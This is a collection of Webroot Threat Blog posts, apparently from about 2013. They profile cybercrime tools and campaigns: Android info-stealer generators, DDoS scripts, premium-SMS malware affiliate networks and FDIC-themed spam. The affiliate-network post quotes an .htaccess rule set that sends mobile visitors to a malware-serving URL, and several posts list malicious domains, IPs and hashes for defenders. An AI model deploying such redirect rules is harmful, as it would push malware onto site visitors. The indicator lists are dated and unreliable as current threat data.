What is Tor? Is it really secure? What about the Apple App Store approval process? Are all these applications really looked at?
In today’s episode, Grayson Milbourne covers the exploitation of the Tor network through Firefox and a proof of concept showing just how insecure Apple app testing can be.
The post [Video] ThreatVlog, Episode 1: Tor and Apple exploits revealed appeared first on Webroot Threat Blog.
Over the next few days, you will begin to see some changes to the Webroot ThreatBlog. As the company has grown, so has the need for our threat research to be delivered in a clearer, more concise manner. We have worked long and hard on the new blog, including adding new content like the ThreatVlog, as well as highlighting the individuals behind all the great threat research done here at Webroot.
So with that, we want to welcome you to the brand new Webroot ThreatVlog. It is more than a URL update, but a whole new look to help you better stay updated on the digital threats out there, and just how to stay protected.
To better help you transition, here are two links for reference.
New web URL: http://www.webroot.com/blog/
RSS feed update: http://www.webroot.com/blog/feed/
The post Changes to the Webroot ThreatBlog appeared first on Webroot Threat Blog.
What is Tor? Is it really secure? What about the Apple App Store approval process? Are all these applications really looked at?
In today’s episode, Grayson Milbourne covers the exploitation of the Tor network through Firefox and a proof of concept showing just how insecure Apple app testing can be.
The post [Video] ThreatVlog, Episode 1: Tor and Apple exploits revealed appeared first on Webroot Threat Blog.
Over the next few days, you will begin to see some changes to the Webroot ThreatBlog. As the company has grown, so has the need for our threat research to be delivered in a clearer, more concise manner. We have worked long and hard on the new blog, including adding new content like the ThreatVlog, as well as highlighting the individuals behind all the great threat research done here at Webroot.
So with all that, we want to welcome you to the brand new Webroot ThreatVlog. It is more than a URL update, but a whole new look to help you better stay updated on the digital threats out there, and just how to stay protected.
To better help you, here are a few updated links to help you.
New web URL: http://www.webroot.com/blog/
RSS feed update: http://www.webroot.com/blog/feed/
The post Changes to the Webroot ThreatBlog appeared first on Webroot Threat Blog.
In this episode of ThreatVlog, Grayson Milbourne covers the information behind the Syrian Electronic Army’s hacking of New York Times, Twitter, and Huffington Post. Grayson includes a breakdown of the hack as well as information on how to keep your own websites protected form this malicious behavior.
The post [Video] ThreatVlog, Episode 3: NYT, Twitter, and HuffPost hacked by Syrian Electronic Army appeared first on Webroot Threat Blog.
Back in June, 2013, we offered a peek inside a DIY Android .apk decompiler/injector that was not only capable of ‘binding’ malicious Android malware to virtually any legitimate app, but also, was developed to work exclusively with a publicly obtainable Android-based trojan horse.
In this post, I’ll profile a similar, recently released cybercrime-friendly Windows-based tool that’s capable of generating malicious ‘sensitive information stealing’ Android .apk apps, emphasize on its core features, and most importantly, discuss in depth the implications this type of tool could have on the overall state of the Android malware market.
More details: Sample screenshots of the malicious Android .apk generating ‘sensitive information stealer’:
The cybercriminal is capable of stealing WhatsApp messages (only on rooted devices), SMS messages, personal info, contacts and photos, and can also be made to auto-start, or be triggered by a specific SMS message sent to the device. The stolen data can then be configured to be sent back to the attacker, using the existing connection of the victim, or in an ‘all-in-one’ zip file to a pre-configured email account.
Not surprisingly, cracked versions of the ‘sensitive information stealer’ are already circulating in the wild.
What’s also worth emphasizing on in terms of the relevance of such tools in today’s Android malware market segment, is that automation, efficiency and QA (Quality Assurance) are likely to continue getting applied to commercially available underground market releases, that enable virtually anyone who purchases them to generate undetected pieces of malicious software for the Android platform, to be later on monetized through an affiliate network.
Moreover, in times when mobile traffic can be purchased/abused on the fly, and redirected to any given URL provided by a potential cybercriminal, we expect to continue observing an abuse of cybercrime-friendly underground market traffic exchanges, in combination with either the direct compromise of a legitimate host, or actual hijacking of a trusted/verified Google Play account through data mining a botnet’s infected population as a tactic of choice.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.
The post DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild appeared first on Webroot Threat Blog.
Over the last couple of days, we’ve intercepted a rather interesting fraudulent approach that’s not just successfully hitting the inboxes of users internationally, but is also popping up as an event on their Android Calendar apps.
How is this possible? Fairly simple.
Sample screenshot of the fraudulent Google Calendar invitation:
Through automatic registration — thanks to the outsourcing of the CAPTCHA solving process — fraudsters are registering thousands of bogus accounts to be later on abused as being part of Google’s Ecosystem, the Calendar feature in particular, which is also automatically syndicated on all Android devices.
Therefore, by automating the process of sending Calendar Invites, 419 advance fee scammers or virtually any type of scammers, are directly syndicating their fraudulent ‘proposals’ with the Android devices of their prospective victims. The tactics greatly remind us of known cases where 419 advance fee scammers are known to have abused Dilbert.com and NYTimes.com’s “Email This” feature in an attempt to successfully bypass anti-spam filters.
Due to the ease of registering tens of thousands of Google Accounts, or actually buying access to pre-registered accounts, we expect that this practice will continue, with the fraudsters behind it eventually shortening the time frame between the invitation and the actual event, to achieve a near real-time ‘reminder’ notification for a Calendar Event.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.
The post Scammers pop up in Android’s Calendar App appeared first on Webroot Threat Blog.
In this episode of ThreatVlog, Nathan Collier covers the old, but still around, SMS Fake Installer, a Russian based program used to trick phone users to send premium text messages, costing money to the user. Nathan talks about how these threats work, how this threat is different, and the easiest way to stay protected on your Android powered phone.
The post [Video] Episode 4: ThreatVlog SMS Fake Installer tricking Android Users appeared first on Webroot Threat Blog.
The idea of controlling multiple, high-bandwidth empowered servers for launching DDoS attacks, compared to, for instance, controlling hundreds of thousands of malware-infected hosts, has always tempted cybercriminals to ‘innovate’ and seek pragmatic ‘solutions’ in order to achieve this particular objective.
Among the most recent high profile example utilizing this server-based DDoS attack tactic is Operation Ababil, or Izz ad-Din al-Qassam a.k.a Qassam Cyber Fighters attacks against major U.S financial institutions, where the use of high-bandwidth servers was utilized by the attackers. This indicates that wishful thinking often tends to materialize.
In this post, we’ll take a peek inside what appears to be a command and control PHP script in its early stages of development, which is capable of integrating multiple (compromised) servers for the purpose of launching distributed denial of service attacks (DDoS) taking advantage of their bandwidth.
More details:
Sample screenshots of the administration panel of the PHP script:
Currently, the PHP script supports four types of DDoS attack tactics, namely DNS amplification, spoofed SYN, spoofed UDP, and HTTP+proxy support. The script also acts as a centralized command and control management interface for all the servers where it has been (secretly) installed on. It’s currently offered for $800.
Just like we’ve seen in numerous other cybercrime-friendly underground market releases, in this case, the author of the PHP script is once again forwarding the responsibility for its use to potential customers, and surprisingly, in times when fake scanned IDs continue getting systematically abused by cybercriminals, is expressing his trust in the user legitimization methods applied by his payment processor of choice – WebMoney.
We believe that this tool will eventually get abused by its customers, and we’ll continue to monitor its future development.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.
The post Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the wild appeared first on Webroot Threat Blog.
In a series of blog posts, we’ve been profiling the tactics and DIY tools of novice cybercriminals, whose malicious campaigns tend to largely rely on social engineering techniques, on their way to trick users into thinking that they’ve been exposed to a legitimate Java applet window. These very same malicious Java applets, continue representing a popular infection vector among novice cybercriminals, who remain the primary customers of the DIY tools/attack platforms that we’ve been profiling.
In this post, I’ll discuss a popular service, that’s exclusively offering hosting services for malicious Java applets.
Sample screenshot of the service:
For a one time fee of $20, the service offers detailed statistics about how people ran the applet hosted on their server, as well as the ability to clone a popular website to be later on automatically embedded with a custom malicious Java applet on it. The service is also offering managed rotation of typosquatted domains to its prospective customers, in an attempt to make it easier for them to operate their campaigns.
Based on our initial analysis on the service’s operations, we can easily conclude that its operators lack the experience and motivation to run it, compared to that of sophisticated bulletproof hosting providers, like the ones we’ve already profiled in the past. Nevertheless, its public availability has already empower multiple novice cybercriminals with the hosting services necessary to achieve their malicious objectives.
Although we believe that this a short-term oriented market niche international underground market proposition, we’ll continue monitoring its development.
The post Managed Malicious Java Applets Hosting Service Spotted in the Wild appeared first on Webroot Threat Blog.
In this episode of ThreatVlog, Tyler Moffitt talks about the 2 million user hack that Vodafone experienced last week, which investigators are saying is an inside job. He also goes into the arrest of Superhacker out of Argentina, who turned computers into zombies and was able to steal $50,000 a month from users. And in big news, Grand Theft Auto V was released today, and already torrents are being discovered packed full of malware and phishing schemes.
The post [Video] Episode 5: Vodafone hacked, Super Hacker arrested, and bad GTAV torrents appeared first on Webroot Threat Blog.
Affiliate networks are an inseparable part of the cybercrime ecosystem. Largely based on their win-win revenue sharing model, throughout the years, they’ve successfully established themselves as a crucial part of the cybercrime growth model, further ensuring that a cybercriminal will indeed receive a financial incentive for his fraudulent/malicious activities online.
From pharmaceutical affiliate networks, iPhone selling affiliate networks, to affiliate networks for pirated music and OEM (Original Equipment Manufacturer) software, cybercriminals continue to professionally monetize each and every aspect of the underground marketplace, on their way to harness the experience, know-how and traffic acquisitions capabilities of fellow cybercriminals.
In this post, I’ll take a peek inside a cybercrime-friendly affiliate network for premium-rate SMS based mobile malware, list its associated numbers currently in use, provide MD5s of variants known to have been pushed by it, and discuss its business model.
Sample screenshots of the administration panel for a participant in the affiliate network for mobile malware:
What’s also worth emphasizing on next to the fact that everyone can join the affiliate network, is that the premium rate sms-sending mobile malware supports multiple operating systems, as it can expose users to .APK, .SIS and .JAR variants of the same mobile malware. The social engineering vectors of choice for the cybercriminals behind the affiliate network are as follows:
Let’s discuss the ingenious from a scammer’s perspective ‘agreement’ that users who want to get access to the bogus/fraudulent content, automatically accept. First of all, the web sites participating in the affiliate network “assumes no responsibility for any direct or consequential loss arising from the use of the application , including loss of profits and losses“, and that’s just for starters. Whenever a socially engineered user attempts to install the rogue applications, the initial SMS he/she will send automatically results in a subscription to the service, with the rogue applications sending premium-rate SMS messages in the background.
Known mobile malware MD5s pushed by the affiliate network:
MD5: 58668c269215e6e8a781e8e7bac1b4c3 – detected by 24 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Java:SMSreg-AW [PUP]
MD5: c12d148689cfbb80b271036c260b1d91 – detected by 27 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
MD5: ead1a96f2a240987027e7935d3dfaef6 – detected by 24 out of 46 antivirus scanners as Trojan:Android/Fakeinst.T; Android:FakeInst-BH [Trj]
MD5: 306fe878ac61615c0571d34b3de733a6 – detected by 26 out of 45 antivirus scanners as Trojan.Java.Smssend.AE; HEUR:Trojan-SMS.J2ME.Agent.gen
MD5: 7fb7e22dcc91b24498f1c14e5d41a21d – detected by 26 out of 46 antivirus scanners as HEUR:Trojan-SMS.J2ME.Agent.gen; Trojan.Java.Smssend.AE
Premium-rate numbers used in the campaigns:
3150; 3170; 3200; 3190; 8055; 8155; 3352; 3353; 1350; 7122; 4448; 9990; 3150; 3190; 3006; 3170; 9293; 9394; 5060; 3602; 1897; 4161; 4446; 4449; 4448; 1302; 82300
.htaccess modification suggestion to automatically serve the mobile malware to the visitor of the Web site:
RewriteEngine on
RewriteCond %{HTTP_ACCEPT} “text/vnd.wap.wml|application/vnd.wap.xhtml+xml” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “wapp|wapr|webc|winw|winw|xda|xda-” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “up.browser|up.link|windowssce|iemobile|mini|mmp” [NC,OR]
RewriteCond %{HTTP_USER_AGENT} “symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android” [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ hxxp://browserupdate.mobi/mf/?stream=&type=apk [L,R=]
Known mobile malware serving domains part of the core infrastructure of the affiliate network:
hxxp://iosoffer.mobi/cpa/&stream= – 91.223.77.198
hxxp://mid2psys.mobi/js.php?stream= – 91.223.77.198
hxxp://browserupdate.mobi/mf/?stream= – 91.213.175.66
hxxp://playsmarket.mobi/?stream= – 91.213.175.66
hxxp://adtivirusmobile.mobi/?stream= – 91.213.175.66
hxxp://wapadults.mobi/?stream=3963 – 91.213.175.66
Responding to 91.223.77.198 are also the following domains participating in the affiliate network’s infrastructure:
allnokia88.ru
allnokia99.ru
iosoffer.mobi
mid2psys.mobi
mob-in-portal.mobi
serv-nokia.ru
Related obile malware domains known to have participated in campaigns courtesy of the same affiliate network:
3xplay.ru
adtivirusmobile.mobi
advdemo.ru
allnokia88.ru
allnokia99.ru
allwapup.ru
android4plays.ru
awtoforum.ru
browserupdate.mobi
burniyson.org
funkit-fot-you.ru
google-video.ru
htavefg.ru
java-praktika.ru
kopiivipshop.ru
lwupdate.ru
market-mobile.tk
mid2psys.mobi
mob-in-portal.mobi
mobi-fotoppz.ru
mobpornn.biz
my-hut.ru
news-top.info
newsmobi.info
opera-mini-software.ru
opera-seven.ru
operablock-in.mobi
operamini-7-5.ru
operamobi-in.mobi
operanew-in.mobi
operanew-in.ru
operaupdate-in.mobi
operaupdate-in.ru
playsmarket.mobi
poppnuha.ru
rap-schokk.ru
scaner.biz
serv-nokia.ru
shwap.mobi
soft-ipad.tk
soft-iphone.tk
sotkina.pp.ua
tutnauka.ru
update-brows.tk
vandroide.ru
wapadults.mobi
xvideos-porno.mobi
xxx-tubesex.ru
xxx4iphone.ru
xxx4mobile.ru
zonanauki.ru
We expect to continue observing in an increase of mobile mobile pushed through affiliate networks, empowering underground market participants with the managed infrastructure, the systematically rotated undetected mobile malware samples, and the actual monetization vector to take advantage of in the first place.
The post Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps appeared first on Webroot Threat Blog.
We’ve all seen it; maybe it’s on your own computer, or that of a friend, your spouse, child, or parent. Your home page has been changed to some search engine you’ve never heard of, there’s a new, annoying toolbar in your browser. Maybe you’re getting popup ads or have a rogue security product claiming you’re infected and asking you to buy the program to remove the infection. Even worse, you don’t know how it got there! Welcome to the world of Potentially Unwanted Applications (PUAs.) Chances are that these programs were inadvertently installed while installing software from sites that use “download managers” that add additional software to otherwise free downloads.
Many of these “download managers” and the additional applications they install use a Pay Per Install business model that is often used by unscrupulous individuals that use various techniques to trick you into clicking on their sites rather than the official download site for the software you’re attempting to download. These techniques include using advertisements on search engines and various Search Engine Optimization (SEO) techniques to get their sites to show up before the official downloads in search results. We’ve even seen fake image upload sites whose sole purpose is to direct you to a page that looks like an official download page for a program but uses one of these “download managers” instead.
So how do you avoid these “download managers?” It’s actually pretty simple. Whenever possible, download software from the software company’s official page (this is not always possible since some software is only available through third-party download sites.) As mentioned earlier, some of the most popular techniques to get you to install software using these “download managers” is through ads and SEO techniques on search engines, so we’ll show you how to locate the official download links in search results from Google, Bing, and Yahoo.
For this example we’ll search for the popular voice and video chat program Skype by searching for “download Skype.”
With Google it is rather easy to spot the official download link since the advertisements are clearly marked, and the first actual result is the official download link:
Let’s have a look at Bing next. Since both Skype and Bing are Microsoft products, the first two search results are for the official download links:
For a better example of Bing results, let’s search for Adobe Reader by searching for “download adobe acrobat reader.” This one is also pretty easy to spot since the ads are clearly marked.
Now let’s have a look at the results for “download Skype” on Yahoo. Once again, the ads are clearly marked and the first actual result is the official download link.
Looking at these search results, you’ll notice a few things in common: The top results are all ads, and none of the ads point to the official download links, and the first actual link that is not an advertisement is the official download link. While this will not always be the case, it is common, and fortunately the three search engines we used in this example all do a very good job at identifying their advertisements. Does this mean that all ads are bad? Of course not! But when looking to download free software, the ads may not be your best choice. Also pay attention to the URLs, the official downloads are all on “skype.com” domains, while all the adds point to other domains.
Now you should have a better understanding of how some of those unwanted toolbars and search pages ended up on your computer, that clicking on the top result on a search page may not be the best way to go about downloading free software, and how to find the official download links for software on some of the most popular search engines. Pass this information onto others, and maybe you’ll save yourself a trip to a friend or family member’s house to remove an unwanted toolbar.
The post How to avoid unwanted software appeared first on Webroot Threat Blog.
Opportunistic 419 advance fee scammers are currently using CNN.com’s “Email This” feature to spamvertise Syrian Crysis themed emails, in an attempt to successfully bypass anti-spam filters. Ultimately tricking users into interacting with these fraudulent emails. The emails are just the tip of the iceberg in an ongoing attempt by multiple cybercrime gangs, looking to take advantage of the geopolitical situation (event-based social engineering attack) for fraudulent purposes, who continue spamming tens of thousands of emails impersonating internationally recognized agencies, on their way to socially engineer users into believing the legitimacy of these emails.
Sample screenshot of the spamvertised email:
This isn’t the first time we’ve seen them abusing a legitimate Web site’s “Email This” feature. Followed by the most recent abuse of Google Calendar, we’ve also observed 419-ters abusing legitimate Web sites back in 2009 (Dilbert.com and NYTimes.com), and we believe we’ll continue seeing such type of abuse, taking into consideration the fact that 419-ers are constantly seeking for new and pragmatic ways to bypass anti-spam filters.
How to prevent falling victim to such type of attacks? Go through these tips.
The post 419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams appeared first on Webroot Threat Blog.
For years, cybercriminals have been abusing a rather popular, personally identifiable practice, namely, the activation of an online account for a particular service through SMS. Relying on the basic logic that a potential service user would not abuse its ToS (Terms of Service) for fraudulent or malicious purposes. Now that it associates a mobile with the account, the service continues ignoring the fact the SIM cards can be obtained by providing fake IDs, resulting in the increased probability for direct abuse of the service in a fraudulent/malicious fashion.
What are cybercriminals up to in terms of anonymous SIM cards these days? Differentiating their UVP (unique value proposition) by offering what they refer to as “VIP service” with a “personal approach” for each new client. In this post, I’ll discuss a newly launched service offering anonymous SIM cards to be used for the activation of various services requiring SMS-based activation, and emphasize on its unique UVP.
Sample screenshots of the inventory of anonymous SIM cards offered for sale:
Next to the inventory of cybercrime-friendly non-attributable SIM cards, the cybercriminal behind this underground market proposition is also attempting to add additional value to his proposition, by not just offering the option to store the SIM cards in safe box, but also, destroy the SIM card by offering a video proof of the actual process.
Sample screenshot of a video proof showing the destruction of an already used SIM card courtesy of the service:
The service also charges a premium price for sending and receiving SMS messages, due to the value added features.
The existence and proliferation of such type of services on the basis of false identifies, directly contributes to the rise of fraudulent and malicious schemes launched on behalf of their users. Now that a pseudo-legitimate identification has taken place on popular Web site, a fraudster is in a perfect position to not just start abusing its trusted infrastructure as a foundation for launching related attacks, but also, directly targets a particular Web service’s internal users through the trusted mechanisms offered by it.
We’ll continue monitoring this underground market segment, and post updates as soon as new services offering anonymous SIM cards emerge.
The post Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the SIM card on request appeared first on Webroot Threat Blog.
The general availability of DIY malware generating tools continues to contribute to the growth of the ‘malware-infected hosts as anonymization stepping stones‘ Socks4/Socks5/HTTP type of services, with new market entrants entering this largely commoditized market segment on a daily basis. Thanks to the virtually non-attributable campaigns that could be launched through the use of malware-infected hosts, the cybercrime underground continues to seek innovative and efficient ways to integrate the inventories of these services within the market leading fraudulent/malicious campaigns managing/launching tools and platforms.
Let’s take a peek at one of the most recently launched services offering automatic access to hundreds of malware-infected hosts to be used as anonymization stepping stones.
Sample screenshot of the “malware-infected hosts as anonymization stepping stones” service:
One of the main differentiation factors for this type of services is whether or not they’d continue re-supplying new customers with access to the same set of available compromised and converted to Socks4/Socks5/HTTP servers, or offer exclusively access to a specific set of servers, on a per customer basis only. The lack of QA (Quality Assurance) in this particular service is prone to lower the quality of the campaigns launched using these servers as multiple cybercriminals will now have access to the same pool of compromised hosts, which will inevitably increase the probability that they will be quickly labeled as IPs with extremely bad reputation.
Catch up with previous research on the topic of “Anonymizing a cybercriminal’s Internet activities”, by going through the following posts:
Naturally, there are vendors whose sole objective is to ‘innovate’, in this particular case, reboot the life cycle of a popular anonymization concept known as ‘proxy-chaining’, that is, the process of simultaneously connecting through multiple compromised hosts in an attempt to decrease the chances for a successful identification for a particular attack. Due to the persistent demand for Socks4/Socks5/HTTP based compromised hosts, we expect to continue observing a steady supply of new hosts, with the vendors differentiating their propositions, naturally trying to occupying a market leading share of this in-demand market segment.
The post Yet another ‘malware-infected hosts as anonymization stepping stones’ service offering access to hundreds of compromised hosts spotted in the wild appeared first on Webroot Threat Blog.
Based on historical evidence gathered during some of the major ‘opt-in botnet’ type of crowdsourced DDoS (distributed denial of service) attack campaigns that took place over the last couple of years, the distribution of point’n'click DIY DoS (denial of service attack) tools continues representing a major driving force behind the success of these campaigns. A newly released DIY DoS tool aims to empower technically unsophisticated users with the necessary expertise to launch DDoS attacks by simultaneously utilizing an unlimited number of publicly/commercially obtainable Socks4/Socks5/HTTP-based malware-infected hosts, most commonly known as proxies.
Sample screenshot of the DIY DoS (Denial of Service) tool:
Sample visualization of the DIY DoS (Denial of Service) tool in action using logstalgia:
Despite the fact that the tool lacks diverse DDoS attack methods, as well as a Web-based/server based C&C (command and control) infrastructure, it can still prove to be a powerful tool in the hands of tens of thousands of users recruited/socially engineered into participated in a crowdsourced DDoS attack campaign. Especially in combination with the fact that we continue to observe new market entrants into the market segment for malware-infected hosts converted to Socks4/Socks5/HTTP proxies. As always, we’ll be keeping an eye on its future development, and post updates as soon as any significant updated get introduced.
The post Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based DIY DoS tool appeared first on Webroot Threat Blog.
Today’s modern cybercrime ecosystem offers everything a novice cybercriminal would need to quickly catch up with fellow/sophisticated cybercriminals. Segmented and geolocated lists of harvested emails, managed services performing the actual spamming service, as well as DIY undetectable malware generating tools, all result in a steady influx of new (underground) market entrants, whose activities directly contribute to the overall growth of the cybercrime ecosystem. Among the most popular questions the general public often asks in terms of cybercrime, what else, besides money, acts as key driving force behind their malicious and fraudulent activities? That’s plain and simple greed, especially in those situations where Russian/Eastern European cybercriminals would purposely sell access to Russian/Eastern European malware-infected hosts, resulting in a decreased OPSEC (Operational Security) for their campaigns as they’ve managed to attract the attention of local law enforcement.
In this post, I’ll discuss yet another such service offering access to Russian malware-infected hosts, and emphasize the cybercriminal’s business logic to target Russian users.
Sample screenshot of the service’s advertisement:
The service is currently offering access to malware-infected hosts based in Russia ($200 for 1,000 hosts), United Kingdom ($240 for 1,000 hosts), United States ($180 for 1,000 hosts), France ($200 for 1,000 hosts), Canada ($270 for 1,000 hosts) and an International mix ($35 for 1,000 hosts), with a daily supply limit of 20,000 hosts, indicating an an ongoing legitimate/hijacked-traffic-to-malware-infected hosts conversion. We believe that the availability of Russian based malware-infected hosts is the direct result of either a greed oriented underground market proposition, the direct result of a surplus based proposition, or an attempt by the cybercriminal behind the the offer to differentiate their proposition from the rest of the commoditized services offering access to, for instance, U.S based hosts.
We’ll continue monitoring the service, and post updates as soon as new features — if any — are introduced.
The post Cybercriminals sell access to tens of thousands of malware-infected Russian hosts appeared first on Webroot Threat Blog.
Cybercriminals are mass mailing tens of thousands of malicious Federal Deposit Insurance Corporation (FDIC) themed emails, in an attempt to trick users into clicking on the client-side exploits serving and malware dropping URLs found in the bogus emails. Let’s dissect the campaign, expose the portfolio of malicious domains using it, provide MD5s for a sample exploit and the dropped malware, as well as connect the campaign with previously launched already profiled malicious campaigns.
Sample screenshot of the spamvertised email:
Sample redirection chain:
hxxp://stranniki-music.ru/insurance.problem.html (62.173.142.30) -> hxxp://www.fdic.gov.horse-mails.net/news/fdic-insurance.php (174.142.186.89; 216.218.208.55; 109.71.136.140; 37.221.163.174; 95.111.32.249) Email: comicmotors@writeme.com
Known to have responded to the same IP (174.142.186.89) are also the following fraudulent/malicious domains:
airfare-ticketscheap.com
cernanrigndnisne55.net
demuronline.net
fiscdp.com.airfare-ticketscheap.com
gormonigraetnapovalahule26.net
irs.gov.successsaturday.net
nacha.org.demuronline.net
pidrillospeeder.com
samsung-galaxy-games.net
facebook.com.achrezervations.com
fdic.gov.horse-mails.net
fiscdp.com.airfare-ticketscheap.com
irs.gov.successsaturday.net
nacha.org.demuronline.net
nacha.org.multiachprocessor.com
nacha.org.samsung-galaxy-games.net
The following malicious MD5s are also known to have phoned back to the same IP in the past:
MD5: d672db2c3f398f1bb55ed0030467277d
MD5: 5cb9893095f6087fe741853213f244e8
Known to have responded to 62.173.142.30 are also the following malicious domains:
megapolis-cars.ru
poleznoeda.ru
rutexim.ru
stranniki-music.ru
xn--80ahcajwqeee.xn--p1ai
Known to have responded to 216.218.208.55 are also the followig malicious domains:
demuronline.net
samsung-galaxy-games.net
Known to have responded to 95.111.32.249 are also the following malicious domains:
stjamesang.net
Name servers part of the campaign’s infrastructure:
Name Server: NS1.NAMASTELEARNING.NET – 86.64.152.26 – Email: minelapse2001@outlook.com – Deja vu! We’ve already seen the same email used in a related Facebook themed malicious campaign.
Name Server: NS2.NAMASTELEARNING.NET – 205.28.29.52
The following name servers are also providing DNS services to the following malicious domains:
achrezervations.com
airfare-ticketscheap.com
children-bicycle.net
demuronline.net
fairfieldpoa.net
fdic-payalert.com
gagcenter.net
horse-mails.net
judicialcrisis.net
lacave-enlignes.com
lindoliveryct.net
multiachprocessor.com
nacha-ach-processor.com
namastelearning.net
oleannyinsurance.net
onsayoga.net
pidrillospeeder.com
protektest.net
samsung-galaxy-games.net
smscente.net
stjamesang.net
successsaturday.net
taltondark.net
thefastor.com
ulsmart.net
MD5 for a sample served client-side exploit: MD5: 92897ad0aff69dee36dc22140bf3d8a9. Sample MD5 for the dropped malware: MD5: 7b6332de90e25a5b26f7c75910a22e0c.
Once executed, the sample phones back to the following C&C servers:
217.34.53.163
213.219.135.107
46.223.150.132
108.218.11.143
75.44.92.13
72.81.0.118
217.35.75.232
81.138.21.57
200.84.149.84
84.59.151.27
86.179.220.43
88.247.80.140
99.114.220.224
99.21.49.32
81.130.51.125
108.210.102.165
108.234.133.110
108.240.232.212
86.142.201.20
71.10.54.162
92.4.217.3
188.129.147.67
68.4.133.127
82.211.142.218
81.133.100.39
173.14.178.233
151.97.100.116
86.11.143.176
68.179.19.29
69.70.121.162
173.63.220.65
79.135.34.53
74.7.151.25
71.48.23.198
85.18.21.33
Webroot SecureAnywhere users are proactively protected from these threats.
The post Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware appeared first on Webroot Threat Blog.
In this episode of the ThreatVlog, Marcus Moreno discusses a new, very malicious form of FBI Ransomware that forces the users of infected machines to look at illegal imagery, taking the scare tactics to the next level. He also discusses a new Javascript hack that takes over your browser temporarily, attempting to get people to pay for it to be unlocked.
The post ThreatVlog Episode 6: FBI Ransomware forcing child porn on infected computers appeared first on Webroot Threat Blog.
